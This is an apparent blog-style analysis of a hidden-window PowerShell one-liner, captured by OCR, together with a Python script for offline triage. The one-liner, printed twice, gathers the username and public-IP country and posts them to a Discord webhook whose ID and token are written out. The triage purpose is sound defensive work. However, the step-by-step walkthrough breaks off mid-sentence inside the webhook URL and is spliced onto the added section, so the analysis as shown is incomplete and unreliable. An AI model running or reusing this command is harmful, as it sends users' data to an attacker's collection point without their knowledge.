Understanding Unexpected Command Prompt Activity: Analyzing a Suspicious PowerShell Script
Encountering a Command Prompt (CMD) window that suddenly opens and closes can be concerning, especially when what it ran is unclear. Recently, a user reported such an incident and captured the window's contents via OCR before it vanished. This post evaluates the captured command line, deciphers its intent, and provides guidance on how to respond.
The Script in Question
The captured command line appears as follows:
```plaintext
C:\Windows\System32>powershell -w hidden -c "$u=$env:USERNAME; $i=(iwr 'https://api.ipify.org');$g=ira(\"http://ip-api.com/json/$i\") ;if($g.country -eq ‘United States'){ $b='https://discord.com/api/webhooks/1391522041089495120/ZAeZP6d0MyBhKZNxESBGEWnuhi7azGRqdTYHBHz3XX80sUwk1fXUanMLwjHFGLpDG_LN' ; $m=\"Username: $u‘nLocation: $($g.country)\";irm -Uri $b -Method Post -Body (@{content=$m} | ConvertTo-Json) -ContentType ‘application/json’}"
```
(Note: the captured text contains OCR artifacts rather than PowerShell as typed: curly quotes stand in for straight quotes, `ira(` is most plausibly `irm` (`Invoke-RestMethod`), `‘n` in the message string is the backtick-n newline escape, and the `\"` sequences are how double quotes are embedded inside the quoted `-c` argument on the Windows command line. The walkthrough below reads each fragment that way.)
Deciphering the Script’s Functionality
- Hide the PowerShell window: the `-w hidden` (`-WindowStyle Hidden`) parameter keeps the PowerShell console from being shown, so the user only sees the launching CMD window (note the `C:\Windows\System32>` prompt) flash and close.
- Retrieve the current username: `$u=$env:USERNAME` stores the name of the logged-on user.
- Gather the external IP address: `$i=(iwr 'https://api.ipify.org')` asks api.ipify.org for the machine's public IP using `Invoke-WebRequest` (`iwr`).
- Geolocate the IP address: `$g=irm "http://ip-api.com/json/$i"` (read as `Invoke-RestMethod`; the capture shows `ira`) queries the ip-api.com JSON API over plain HTTP and stores the parsed response, including its `country` field, in `$g`. The double quotes matter: `$i` is only expanded inside a double-quoted string.
- Conditional action based on location: `if($g.country -eq 'United States')` means nothing further happens unless the machine geolocates to the United States, a geofence that limits which victims generate a report.
- Construct a Webhook URL: `$b=’https://discord.com
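As an added triage example (not part of the original post, and not tooling the reporting user had), the following Python script normalizes the OCR artifacts noted above and pulls out of the captured line the indicators a responder wants first: the hidden-window flag, the download cmdlets used, the hosts contacted, the Discord webhook ID and token, and the geofence string. The OCR substitutions it applies (curly quotes to straight quotes, `\"` to `"`, and `'n` before a capital letter to PowerShell's backtick-n escape) are assumptions made for this specific capture, and the captured command line is embedded as the sample input.

```python
"""Offline triage of an OCR-captured PowerShell one-liner (added example)."""
import json
import re
from urllib.parse import urlparse

# Sample input: the command line as captured (via OCR) from the vanished CMD window.
CAPTURED = r'''C:\Windows\System32>powershell -w hidden -c "$u=$env:USERNAME; $i=(iwr 'https://api.ipify.org');$g=ira(\"http://ip-api.com/json/$i\") ;if($g.country -eq ‘United States'){ $b='https://discord.com/api/webhooks/1391522041089495120/ZAeZP6d0MyBhKZNxESBGEWnuhi7azGRqdTYHBHz3XX80sUwk1fXUanMLwjHFGLpDG_LN' ; $m=\"Username: $u‘nLocation: $($g.country)\";irm -Uri $b -Method Post -Body (@{content=$m} | ConvertTo-Json) -ContentType ‘application/json’}"'''

# OCR artifacts to undo before pattern matching. These substitutions are
# assumptions specific to this capture (curly quotes for straight quotes).
_QUOTE_FIXES = {"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'}

URL_RE = re.compile(r"https?://[^\s'\")]+")
WEBHOOK_RE = re.compile(r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
GEOFENCE_RE = re.compile(r"\.country\s+-eq\s+'([^']+)'")
CMDLET_RE = re.compile(
    r"\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression)\b",
    re.IGNORECASE,
)


def normalize_ocr(text: str) -> str:
    """Return the captured text with the OCR damage that blocks matching undone."""
    for bad, good in _QUOTE_FIXES.items():
        text = text.replace(bad, good)
    # The -c payload was quoted on the command line, so inner double quotes arrive as \"
    text = text.replace('\\"', '"')
    # Assumption for this capture: OCR rendered the `n newline escape in the message as 'n
    return re.sub(r"'n(?=[A-Z])", "`n", text)


def triage(cmdline: str) -> dict:
    """Extract the indicators a responder wants first from one command line."""
    text = normalize_ocr(cmdline)
    urls = URL_RE.findall(text)
    webhook = WEBHOOK_RE.search(text)
    geofence = GEOFENCE_RE.search(text)
    report = {
        "hidden_window": HIDDEN_RE.search(text) is not None,
        "download_cmdlets": sorted({m.lower() for m in CMDLET_RE.findall(text)}),
        "urls": urls,
        # Hosts to search for in DNS and proxy logs across the fleet
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        # Webhook ID and token identify the attacker's collection point
        "webhook": {"id": webhook.group(1), "token": webhook.group(2)} if webhook else None,
        "geofence": geofence.group(1) if geofence else None,
    }
    reasons = []
    if report["hidden_window"]:
        reasons.append("console window hidden from the user")
    if report["webhook"]:
        reasons.append("posts data to a Discord webhook (exfiltration channel)")
    if report["geofence"]:
        reasons.append(f"acts only when geolocation says {report['geofence']!r}")
    report["reasons"] = reasons
    report["verdict"] = (
        "malicious" if report["webhook"] and report["hidden_window"] else "review"
    )
    return report


if __name__ == "__main__":
    print(json.dumps(triage(CAPTURED), indent=2))
```

Run it as-is to print the report for the captured line; in practice, paste any logged command line (Security event 4688 with command-line auditing enabled, or the script block text from PowerShell event 4104) in place of `CAPTURED`. The `hosts` list is what to hunt for in DNS and proxy logs, and the webhook ID and token are what to block and report.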